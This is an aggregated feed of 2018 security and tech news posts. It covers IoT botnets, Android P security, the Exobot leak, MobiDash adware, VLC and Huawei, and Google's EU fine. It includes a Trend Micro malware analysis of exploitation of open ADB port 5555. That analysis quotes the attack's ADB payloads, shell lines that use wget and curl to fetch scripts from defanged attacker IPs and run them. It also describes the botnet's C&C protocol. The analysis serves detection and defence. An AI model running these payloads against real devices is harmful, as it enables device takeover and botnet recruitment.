The ADB threat, meanwhile, is seemingly linked to the Satori version of Mirai and was likely created by the same author, according to a July 2018 IBM X-Force threat advisory. This means that despite increased awareness of IoT threats, Mirai-based attacks are still in development — and still succeeding.

How Can Companies Mitigate the Risk of IoT Botnets?

To protect IoT environments from threats like Mirai, IBM experts recommend changing all default passwords and establishing an incident response team to “conduct regular gap analyses to monitor the data generated by connected devices.”

Organizations should also be aware of emerging Telnet trends in IoT botnets. After the Mirai attack, for example, the use of Telnet attack source rose by 140 percent. IBM X-Force researchers suggest limiting Telent use in corporate environments or replacing it with a stronger alternative like Secure Shell (SSH).

Sources: Fortinet, Trend Micro

The post Threat Actors Breach Consumer Devices to Build IoT Botnets appeared first on Security Intelligence.

Fortnite for Android to come as Galaxy Note 9 “Exclusive” at launch

Samsung Galaxy Note 9 rumored to offer Fortnite on Android

If rumors are to be believed, then Samsung is reportedly collaborating with the renowned gaming firm, Epic Games to launch “Fortnite” on Android with its upcoming flagship, Galaxy Note 9 next month. According to 9To5Google’s source, “Fortnite” for Android will be exclusive to the Galaxy Note 9 for 30 days and then arrive on other Android handsets shortly after that.

While “Fortnite” has been available for iOS devices since March, it is yet to be launched on Android devices. However, in May this year, Epic Games had announced that they would be bringing the insanely popular battle royale game “Fortnite” on Android this summer.

In a separate report, a source also told XDA, that Samsung is interested in advertising the Galaxy Note 9 as a gaming smartphone and the device is going to be the first phone to launch and have Fortnite Mobile on it. In order to support gaming on the smartphone, Galaxy Note 9 will come with a vapor chamber heat pipe to prevent thermal throttling while playing games. It is also rumored to feature high-end specs, which include Qualcomm Snapdragon 845 processor, 6GB of RAM and up to 128GB of internal storage.

Further, the partnership between Samsung and Epic Games will see the South Korean giant offering a promotion worth $100-$150 of V-Bucks (Fortnite‘s in-game currency that can be used to buy skins, customizations, and the works) for people who pre-order a Galaxy Note 9. For those who aren’t interested in the V-Bucks, Samsung will offer a package that nets you a set of wireless AKG headphones. It is reported that Samsung has been even added the note series’ S-pen functionality to the Fortnite in some way.

While the combination of Samsung and Epic Games definitely sounds exciting, nothing has been officially confirmed by either of the parties. With the Galaxy Note 9 expected to be launched on August 9th, we shall soon find out if the rumors are accurate or not. Keep watching this space for more updates!

The post Fortnite for Android to come as Galaxy Note 9 “Exclusive” at launch appeared first on TechWorm.

New Android P includes several security improvements

According to the Android developer Program Overview, the next major version of Android, Android 9.0 or P, is set to arrive soon. Their plans show a final release within the next three months (Q3 2018).

The end of the Android P beta program is approaching, with the first release candidate built and released in July. As a security company, we simply can’t help but take a close look at what kind of security updates will be included in Android’s newest version.

We are not going to write about new features of Android P, but instead will focus our attention on security improvements. Android P introduces a number of updates that enhance the security of your apps and the devices that run them.

Improved fingerprint authentication

For our own safety, most devices (and many apps) have an authentication mechanism. The new Android P OS provides improved biometrics-based authentication. In Android 8.1, there were two new metrics that helped its biometric system repel attacks: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). Along with a new model that splits biometric security into weak and strong, biometric authentication becomes more reliable and trustworthy in Android P.

Android P also promises to deliver a standardized look, feel, and placement for the dialog that requests a fingerprint. This increases user’s confidence that they are interacting with a trusted source. App developers can trigger the new system fingerprint dialog using a new BiometricPrompt API, and it’s recommended to switch over to the new system dialog as soon as possible. The platform itself selects an appropriate biometric to authenticate with; thus developers don’t need to implement this logic by themselves.

Biometric authentication mechanisms are becoming increasingly popular and they have a lot of potential, but only if designed securely, measured accurately, and implemented correctly.

Signature Scheme v3

Android P pushes support for APK Signature Scheme v3. The major difference from v2 is key rotation support. Key rotation will be useful for developers, as this scheme has ApkSignerLineage included. As the review committee states:

“The signer lineage contains a history of signing certificates with each ancestor attesting to the validity of its descendant. Each additional descendant represents a new identity that can sign an APK. In this way, the lineage contains a proof of rotation by which the APK containing it can demonstrate, to other parties, its ability to be trusted with its current signing certificate, as though it were signed by one of its older ones. Each signing certificate also maintains flags which describe how the APK itself would like to trust the old certificates, if at all, when encountered.”

This gives you an opportunity to sign with a new certificate easily. You simply link the APK files to the ones with which they are now signed.

Although Scheme v3 turns on by default, note that you can still use an old signing certificate.

HTTP Secure (HTTPS) by default

Nowadays, many apps are still transmitting users’ information unencrypted, making personal data vulnerable to hackers. People bothered by potential for breach or invasion of privacy can feel more secure knowing their transmissions in Android P will be secure by default.

In Android P, third-party developers will have to enable HTTPS (It was optional in Android 8.0) for their apps. However, they can still ignore the advice and specify certain domains that will deliver unencrypted traffic.

Protected confirmation

A protected confirmation API exists in all devices launched with Android P. Using this API, apps can use the ConfirmationPrompt class to display confirmation prompts to the user, asking them to approve a short statement. This statement allows the app to confirm that the user would like to complete a sensitive transaction, such as making a bill payment.

Right after the statement acceptance, your app receives a cryptographic signature, protected by a keyed-hash message authentication code (HMAC). The signature is produced by the trusted execution environment (TEE). This protects the display of the confirmation dialog, as well as user input. The signature indicates, with high confidence, that the user has seen the statement and has agreed to it.

Hardware security module

Here’s an additional update that benefits everyone: Devices with Android P will be supporting a StrongBox Keymaster. The module contains its own CPU, secure storage, and a true random number generator. It also protects against package tampering and unauthorized sideloading of apps.

In order to support StrongBox implementations, Android P uses subset of algorithms and key sizes, such as:

  • RSA 2048
  • AES 128 and 256
  • ECDSA P-256
  • HMAC-SHA256 (supports key sizes between 8 bytes and 64 bytes, inclusive)
  • Triple DES 168

Peripherals background policy

With Android P, apps will not be able to access your smartphone’s microphone, camera, or sensors. Users get a notification when apps attempt to access these in the background. On attempting, the microphone will report empty audio, cameras will disconnect (causing an error if the app tries to use them), and all sensors will stop reporting events.

Backup data encryption update

It’s not a secret that Android backs up data from your device. Users can then restore data after signing into their Google account from another device. Starting with Android P, it’ll start using a client-side secret method for its encryption. This means encryption will be done locally on the device, whereas before, a backup of your device was encrypted directly on the server.

Because of this new privacy measure, users will need the device’s PIN, pattern, or password to restore data from the backups made by their device.

Wrapping things up

All these improvements mean only one thing: It’ll be significantly harder for criminals to access your data when they shouldn’t be able to. With the massive amounts of breaches over the last two years, this should come as a relief for consumers, who simply want to use their phones without fear of privacy being compromised.

The post New Android P includes several security improvements appeared first on Malwarebytes Labs.

Blog | Avast EN: Build-your-own banking trojan, ransomware on the high seas, and SIM card chaos | Avast

Source code to Exobot banking trojan leaked

“This has happened in the past, and it poses a risk as we saw in the case of the infamous Mirai botnet,” says Avast Security Evangelist Luis Corrons, speaking to the news that the source code to a potent bank trojan known as Exobot has been released into the wild of the dark web for anyone who cares to use it for their own ill will. The publicly-shared Mirai source code gave malware architects the blueprints to a powerful botnet, upon which they expanded. “Many malware writers used it to create their own customized version of the bot. We can expect the same here,” adds Luis.

Blog | Avast EN

Mac Virus: Mobile Malware – Android and iOS

Catalin Cimpanu: Chrome Extensions, Android and iOS Apps Caught Collecting Browsing Data – “An investigation by AdGuard, an ad-blocking platform, has revealed a common link between several Chrome and Firefox extensions and Android & iOS apps that were caught collecting highly personal user data through various shady tactics.”

Pierluigi Paganini: CSE Malware ZLab – APT-C-27 ’s long-term espionage campaign in Syria is still ongoing. After ESET’s Lukas Stefanko revealed the existence of a repository containing Android applications, researchers from CSE Cybsec Z-Lab identified spyware that was “part or the arsenal of a APT group tracked as APT-C-27, aka Golden Rat Organization.” In recent years the group has been focusing its activities in Syria. Here’s the ZLAB Malware Analysis Report.

The Hacker News: iPhone Hacking Campaign Using MDM Software Is Broader Than Previously Known – “India-linked highly targeted mobile malware campaign, first unveiled two weeks ago, has been found to be part of a broader campaign targeting multiple platforms, including windows devices and possibly Android as well.”

Sophos: Red Alert 2.0: Android Trojan targets security-seekers – “A malicious, counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT.”

David Bisson for Tripwire: Exobot Android Banking Trojan’s Source Code Leaked Online -“Bleeping Computer said it received a copy of the source code from an unknown individual in June. In response, it verified the authenticity of the code with both ESET and ThreatFabric…Exobot is a type of malware that targets Android users via malicious apps. Some of those programs made their way onto the Google Play Store at one point.”

David Harley


Mac Virus

Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

By Waqas

In May this year, HackRead reported how an Israeli company Unimania was caught collecting personal, Facebook and browsing data of users through Android apps and Chrome extensions. Now, researchers have discovered another “spyware” campaign aiming at stealing personal data of users but this time it is far bigger than the one previously reported. Ad-blockers and security […]

This is a post from Read the original post: Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

VLC Blacklists Newer Huawei Devices To Combat Negative App Reviews

An anonymous reader quotes a report from The Verge: Some newer Huawei phones are actively being blocked from installing the open-source VLC media player app from Google Play. VLC's developers announced today that they're blacklisting some of Huawei's devices after unhappy users left too many one-star reviews for the app. But the negative reviews stem from a decision on Huawei's part and has nothing to do with VLC. The negative reviews are a result of Huawei's aggressive battery management and tendency to kill background apps, which directly affects VLC's background audio playback feature. Huawei users on VLC's forums are well aware of the issue. It's possible to manually disable these battery optimizations and have the app function properly in the background, but VLC claims that people often don't know how to do that, so they blame the app instead. The devices being blacklisted are the Huawei P8, P10, and P20. Users can still manually download the APK from VLC's website if they're interested in using the player.

Read more of this story at Slashdot.

Expert says: Hack your Smart Home to Secure It

Smart home security starts at home, according to researcher Michael Sverdlin who says that consumers should explore the security of their smart home technology and consider simple modifications or hacks to remove insecure or promiscuous features. Not long ago, Michael Sverdlin, the back-end team leader for IoT security startup Vdoo, bought his...

Read the whole entry... »

Related Stories

Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.

In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb.) According to the Google developer portal,

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tools is being used in a secured environment, it presents little risk. It is recommended that the adb service is disabled before releasing devices to consumers and it is common for the adb service to be restricted to USB connectivity only.

In early June security researcher Kevin Beaumont, warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet, “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”

ADBPort debugging tools

The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server,  then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.

The Trend Micro researchers offer a few suggestions to reduce your risk:

  • On your mobile device, go to settings, select “Developer Options” and ensure that “ADB (USB) debugging and “Apps from Unknown Sources” are turned off
  • Apply recommended patches and updates from the vendor
  • Perform a factory reset to erase the malware if you feel you are infected
  • Update intrusion prevention systems (IPS) to identify potentially malicious code from reaching your device

The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting and is a frequent speaker on ICS, IoT and Blockchain risk topics. He is currently Global CISO for the ATCO Group of companies.

Pierluigi Paganini

(Security Affairs – debugging tools, hacking)

The post Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency appeared first on Security Affairs.

Mobile Menace Monday: Adware MobiDash gets stealthy

The Adware known as MobiDash, detected by Malwarebytes for Android as Android/Adware.MobiDash, is far from a new. However, this ad-displaying nuisance now comes with some additional stealth features.

First appearing last spring, these new features are not limited to a single variant of MobiDash. Instead, the correlation among these stealth versions lays within the package name As a result, these stealth features hide the existence of Adware MobiDash—even when it’s in plain sight!

Look closer

When I first came upon this stealthy MobiDash, a customer was having a terrible time removing the adware from their mobile device. Malwarebytes for Android was unable to remove it, due to it being an active device administrator.

As by design by the Android Operating System, any app given device administrator privileges cannot be uninstalled until first being removed from the device administrator’s list. Attempting to uninstall an app with device administrator rights will display the screen shown above. The screen displays a warning about not being able to uninstall, and provides a link to the device administrator’s list.

Okay, simple enough, just remove the offending piece of adware from the list and uninstall, right?  Well, what if it doesn’t exist in the device administrator’s list!? Have a look for yourself below.

There’s “Find My Device” and “Malwarebytes,” both with legitimate reasons to be in the device administrator’s list. But there’s no adware app in sight.

But wait. Look a little closer.

That blank line right at the bottom of list—bingo! If you didn’t see it at first, you’re not alone.

Even more stealth

After removing Adware MobiDash from the device administrator’s list, now that you see it, the next step is uninstalling. By far, the easiest method to uninstall this tricky adware is to rescan with Malwarebytes for Android. This method assists with easily uninstalling. Removing manually can also be done, albeit it’s a bit trickier.

Manual removal

Depending on your mobile device’s Android OS version, there may be a shortcut icon disguising itself as Settings.

If this exists alongside with the real Settings icon, simply drag the fake Settings icon to Uninstall.

However, there are many cases where this icon doesn’t exist. Thus, it must be removed via the mobile device’s App List: Settings > AppsScroll all the way to the bottom of list, and you’ll discover a blank entry at the very end.

Click on it, and you can uninstall from the app info screen.

The how and why

So how, exactly, can this stealth Adware MobiDash version get device administrator rights? Well, it must be given the rights manually by the user. It’s surprisingly easy for a user to mistakenly do so, and even easier with this piece of adware. Why? Because usually giving an app device administrator rights comes with a list of scary operations to allow. This MobiDash version doesn’t ask for any, as shown below.

So why did it even bother tricking users into activating device administrator if there are no operations to allow? As highlighted above, it makes uninstalling way more tedious—especially with the extra stealth features.

It happens

I could preach about not activating device administrator to unknown apps, but instead I’ll just say, “It happens.” On Android, there are an abundance of features you must allow to get legitimate apps to work properly. This sometimes exhausts users to the point of just blindly allowing everything. It’s no wonder that the bad apps can slip under the radar.

Luckily in this case, the outcome is simply annoying ads and nothing worse. But if you don’t want to deal with the hassle of an adware infection, slowing down and being a little more vigilant can save you time in the long run. Stay safe out there!

The post Mobile Menace Monday: Adware MobiDash gets stealthy appeared first on Malwarebytes Labs.

The source code of the Exobot Android banking trojan has been leaked online

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.

The source code of the Exobot Android banking trojan has been leaked online and experts believe that we will soon assist at a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors were advertising it saying that it can be used for phishing attacks, it implements various features of most common banking Trojan such as intercepting SMS messages.

Exobot is a powerful banking malware that is able of infecting even smartphones running the latest Android versions.

In January, the authors decided to stop working at the malware and offered for sale its source code.

Now researchers from Bleeping Computer confirmed to have received a copy of the source code from an unknown individual and shared it with malware researchers from ESET and ThreatFabric in order to verify its authenticity.

“The code proved to be version 2.5 of the Exobot banking trojan, also known as the “Trump Edition,” one of Exobot’s last version before its original author gave up on its development.” reads a blog post published by Bleeping Computer.

Exobot Android banking trojan

According to experts from ThreatFabric the version provided to Bleeping Computer was leaked online in May. It seems that one of the users that purchased the malicious code decided to leak it online.

According to the experts, the source code for the Exobot Android banking Trojan is now being distributed on a few underground hacking forums, this means that threat actors can now work on their own version and also offer it with a malware-as-a-service model.

“In the coming months, we may see Android malware devs slowly migrating their campaigns from BankBot to Exobot, as few will decline a “free upgrade” to a better code.” concluded Bleeping Computers.

Pierluigi Paganini

(Security Affairs – Android,  banking Trojan)

The post The source code of the Exobot Android banking trojan has been leaked online appeared first on Security Affairs.

TrendLabs Security Intelligence Blog: Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices

by Hubert Lin, Lorin Wu, and Vit Sembera

The exploitation of open ports on devices has been an on-going problem for many IoT users. TCP port 5555, in particular, has had issues in the past due to product manufacturers leaving it open before shipping, which potentially exposes users to attackers.

Recently, we found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. In this scenario, the activity involves the command line utility called Android Debug Bridge (ADB), a part of the Android SDK that handles communication between devices that also allows developers to run and debug apps on Android devices. Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.

 Figure 1. Activity in the TCP Port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15

Figure 1. Activity in the TCP Port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15

Technical Analysis

From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary.

It attacks ADB by uploading the payload via TCP port 5555:

  • “CNXN”,0,0,0,1,0,0×10,0,0,7,0,0,0,”2″,2,0,0,0xBC,0xB1,0xA7,0xB1,”host::”

Once it’s dropped into a device, the payload will delete itself from the disk and renamed with a randomly selected name with an architecture string attached.

The payload will download the shell script, which is removed after execution:

  • “OPENX”,2,0,0,0,0,0,0,0xF2,0x17,”J”,0,0,0xB0,0xAF,0xBA,0xB1,”shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2″

The shell script for the July 9 activity can be seen below:

  • cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs

 Figure 3. ASCII and hex view of the malicious payload from the July 9 activity

Figure 3. ASCII and hex view of the malicious payload from the July 9 activity

In contrast, the payload for the July 15 activity downloads two scripts instead: the earlier “adbs” and a new script called“adbs2”. As before, it will remove them after execution:

  • cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2

 Figure 4. ASCII and hex view of the malicious payload from the July 15 activity

Figure 4. ASCII and hex view of the malicious payload from the July 15 activity

The scripts download the next stage binary for several architectures and launch the corresponding one. They both do the same thing but use different download methods. The first one uses curl and the second one wget built in BusyBox. An example of the wget version can be seen below:

 Figure 5. Code of the binary that was downloaded via wget

Figure 5. Code of the binary that was downloaded via wget

The binary starts by deleting its own binary file from a filesystem. It then checks if its own name is “./.f” with the parameter “yItDitb2HvayJvNc.” If this turns out positive, it will use a hostname “n[.]ukrainianhorseriding[.]com” to resolve the address of the C&C server through the Google DNS server. Otherwise, it uses the hardwired IP address 95[.]215[.]62[.]169 with a connection port of 7267.

It will then close all three stdio streams and get its own IP address, followed by the launch of two child processes.

The first one scans /proc/[pid]/maps memory-mapped regions of all running processes on the system for open temporary files smi, xig or trinity. If found, it kills the corresponding process.  Trinity could be related to the Android system fuzzer, while smi is a known file belonging to the CoinHive script that mines Monero on hijacked Amazon devices.

The second child process is responsible for spreading the malware as a worm.

The main binary continues by writing all three pids mentioned earlier in binary form to one of the following locations:

 Figure 6. Locations where the pids are written

Figure 6. Locations where the pids are written

The binary then opens a connection to the C&C server:

 Figure 7. Communicating with the C&C server

Figure 7. Communicating with the C&C server

It then sends a specially crafted message to the C&C server. Its length is 71 bytes and looks as follows:

“WWau14TJ8IapVXrrlFq0q5sxB”, “\x00 80 00 5A 00 57 00 C8 00 F0 00 1E 00 00” and appended architecture string i.e. “arm7” in 32 bytes array.

C2 then sends to the victim

2 bytes number (x)

Interpretation is following:

if x == 505: receive next 2 bytes from C2

if x == 0xDD99: kill children and exit

if x > 1024: close connection and sleep(10)


receive x bytes from C2 (they are not used, maybe this version is not finishet yet)

receive new x

recv payload containing attacking target list of len x bytes

Each six communication cycles, the victim responds with a 6-byte sequence (9, 3, 2, 5, 8, 1).

This payload contains a header with the number of targets and IP packet types to be sent, followed by a list of target IPv4 addresses that are modified by an infected host with a randomly generated offset. Up next are port numbers and sleep times before it waits for a continuation and a random payload length. The malware then sends crafted IP packets with a randomly generated payload to the obtained attack list — possibly as part of a DDoS attack.

The crafted IP packets consist of the following:

  • UDP with a randomly generated payload of random length
  • TCP SYN packet with a random payload of random length
  • TCP ACK with a random payload of random length
  • UDP with random payload tunneled through Generic Routing Encapsulation (GRE)
  • TCP SYN, after which it will send TCP ACK and ensure that the TCP window size, source port, seq_number and IP identification is consistent with the previous session. There is a three-second wait period between each packet.

An intriguing aspect of the downloaded binaries is that the C&C server 95[.]215[.]62[.]169 was found by researchers to be linked to the Satori variant of the Mirai botnet. Delving into the GeoIP information of the two IP addresses involved in the activity reveal that they are located in Europe; Spain for 95[.]215[.]62[.]169 and the Netherlands for 185[.]62[.]189[.]149.

It’s reasonable to believe that the same author was behind this sample and Satori. The important and identifiable strings are encrypted using a simple XOR method (see the encrypted string example in Figure 8). Interestingly, this malware version uses less a sophisticated string encryption method compared to older samples, which used a combination of byte swap and Base62 encoding.

 Figure 8. Strings encrypted with XOR method

Figure 8. Strings encrypted with XOR method

Their decrypted values can be seen in the figure below. Note that not all of them are used yet.

 Figure 9. String values after decryption

Figure 9. String values after decryption

As mentioned earlier, the worm function and seeking of other potential targets might mean that the two spikes in activities we detected might be a prelude to another attack that might cause more damage. Perhaps in this instance, the threat actors were testing the effectiveness of their tools and tactics to prepare for a more serious attack.

The C&C domain name information shows the same registration e-mail as another C&C server on the domain rippr[.]cc, which was already shut down:

 Figure 10. Information on the C&C domain

Figure 10. Information on the C&C domain

According to data from Shodan, over 48,000 IoT systems are vulnerable to ADB exploitations. Not all vulnerable systems are exposed as they are usually hidden behind routers with Network Address Translation (NAT). However, due to misconfiguration, they can be made accessible either manually or via UPnP NAT traversal. All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength.

Mitigation and Trend Micro Solutions

Users who are comfortable changing the settings of their mobile device can go to settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off. The latter setting is turned off by default but should be double-checked to make sure. If the user suspects that their device is already infected, doing a factory reset can clear the payload.

As a general rule, mobile device users should regularly update their devices to the latest version. Not only do these updates improve the functionality of their devices, but they also address vulnerabilities that attackers can exploit.

Security software designed to combat these kinds of threats are also an option. For example, Trend Micro Smart Home Network™ protects users from this threat via the following intrusion prevention rules:

  • 1134867 EXPLOIT Remote Command Execution via Android Debug Bridge

Indicators of Compromise (IoCs):


  • 79d55852af173612562718544ecdc569b0b8e0094647d609040f8fcc67112cba
  • 144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43


  • 2815ab8fe6d48982540524c6ac55e1df3a77a2e90c32114fde05bdc3bb353bea
  • 144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43
  • 01eca0d68cc8c2d7ad6aa8021852b57a04b8a4ca7d13e164095b29fd06a1ed9f
  • 4c3983040b2c72e4df9742c1314dcf8cd703805ab6aaa9185324b70fd530746e

Additional analysis and insights from Chunbo Song and Tim Yeh

The post Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices appeared first on .

TrendLabs Security Intelligence Blog

Exobot Android Banking Trojan’s Source Code Leaked Online

Someone leaked the source code for the Exobot Android banking trojan online, leading the malware to circulate widely on the underground web. Bleeping Computer said it received a copy of the source code from an unknown individual in June. In response, it verified the authenticity of the code with both ESET and ThreatFabric. Security researchers […]… Read More

The post Exobot Android Banking Trojan’s Source Code Leaked Online appeared first on The State of Security.

Security Affairs: CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.

A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.

APT27 syria


The folder was found on a compromised website at the following URL:


This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area, the researchers discovered that it was part or the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group focused its activity in Syria in the last couple of years, it used both Windows and Android malware to compromise target devices. Its code was not so sophisticated, anyway, the activity of the group is still ongoing.

Searching online we have found only one team of researchers that tracked the activity of the APT27 group in Syria since 2016, it was a group of researchers at 360 Threat Intelligence Center.

The analysis published by the team revealed the activity of the APT27 in Syria, the code analyzed by malware analysts at Zlab at CSE Cybsec and the one dissected by 360 Threat Intelligence Center is quite identical.

The 360 Threat Intelligence Center is dated 2017, the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.

You can download the full ZLAB Malware Analysis Report at the following URL:


Pierluigi Paganini

(Security Affairs – APT27, Syria)

The post CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing appeared first on Security Affairs.

Security Affairs

CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.

A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.

APT27 syria


The folder was found on a compromised website at the following URL:


This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area, the researchers discovered that it was part or the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group focused its activity in Syria in the last couple of years, it used both Windows and Android malware to compromise target devices. Its code was not so sophisticated, anyway, the activity of the group is still ongoing.

Searching online we have found only one team of researchers that tracked the activity of the APT27 group in Syria since 2016, it was a group of researchers at 360 Threat Intelligence Center.

The analysis published by the team revealed the activity of the APT27 in Syria, the code analyzed by malware analysts at Zlab at CSE Cybsec and the one dissected by 360 Threat Intelligence Center is quite identical.

The 360 Threat Intelligence Center is dated 2017, the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.

You can download the full ZLAB Malware Analysis Report at the following URL:


Pierluigi Paganini

(Security Affairs – APT27, Syria)

The post CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing appeared first on Security Affairs.

Droppers Is How Android Malware Keeps Sneaking Into the Play Store

Catalin Cimpanu, writing for BleepingComputer: For the past year, Android malware authors have been increasingly relying on a solid trick for bypassing Google's security scans and sneaking malicious apps into the official Play Store. The trick relies on the use of a technique that's quite common in desktop-based malware, but which in the last year is also becoming popular on the Android market. The technique involves the usage of "droppers," a term denoting a dual or multiple-stage infection process in which the first stage malware is often a simplistic threat with limited capabilities, and its main role is to gain a foothold on a device in order to download more potent threats. But while on desktop environments droppers aren't particularly efficient, as the widespread use of antivirus software detects them and their second-stage payloads, the technique is quite effective on the mobile scene.

Read more of this story at Slashdot.

After EU ruling, Google CEO Pichai hints Android may not remain free

Google warns that Android may not be free in the future

We reported yesterday that Google has been imposed a record $5 billion (4.34 billion euros) fine by the European Union Commission on Wednesday for illegally abusing the dominance of its Android operating system.

Reacting to the EU ruling, Google’s CEO Sundar Pichai in a lengthy blog post said that “the decision rejects the business model that supports Android, which has created more choice for everyone, not less.”

The EU wants Google to stop pre-loading its Chrome browser and its search engine to Android. However, Google countered this statement by saying that the search giant doesn’t force anyone to use either of them and allows phone makers and developers to easily disable or delete pre- loaded apps on the phone and choose other apps instead.

According to Pichai, the free distribution of the Android platform, and of Google’s suite of applications, is “not only efficient” for phone makers and operators but is also of “huge benefit” for developers and consumers. He also added that “if phone makers and mobile network operators couldn’t include our apps on their wide range of devices, it would upset the balance of the Android ecosystem.” In other words, Pichai said that the phone makers will no longer be forced to bundle these apps but can still choose to do so.

However, Pichai warned that its Android business model could now change due to the EU ruling. “So far, the Android business model has meant that we haven’t had to charge phone makers for our technology or depend on a tightly controlled distribution model. We’ve always agreed that with size comes responsibility. A healthy, thriving Android ecosystem is in everyone’s interest, and we’ve shown we’re willing to make changes. But we are concerned that today’s decision will upset the careful balance that we have struck with Android, and that it sends a troubling signal in favor of proprietary systems over open platforms,” Pichai said.

Pichai also added that Google would be appealing against the EU decision. The search giant has 90 days to change its practices or face penalty payments of up to five percent of the worldwide average daily revenue of its parent company, Alphabet.

With Google’s CEO hinting that the free distribution of its own apps earns the company revenue required to maintain the development of the expensive platform, we could very soon see Google start charging phone makers for using the Android platform.

Source: The Verge

The post After EU ruling, Google CEO Pichai hints Android may not remain free appeared first on TechWorm.

